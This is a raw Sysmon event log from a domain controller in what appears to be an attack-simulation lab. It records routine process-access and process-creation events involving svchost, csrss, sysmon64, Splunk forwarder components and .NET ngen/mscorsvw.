13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4513-6000-5201-000000009A01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.064{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4513-6000-5201-000000009A01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:19.066{08A6967A-4513-6000-5201-000000009A01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.314{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4514-6000-5601-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.298{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4514-6000-5601-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.298{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4514-6000-5601-000000009A01}4984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.252{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4514-6000-5501-000000009A01}1180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.252{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4514-6000-5501-000000009A01}1180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.252{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4514-6000-5501-000000009A01}1180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4514-6000-5401-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:20.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 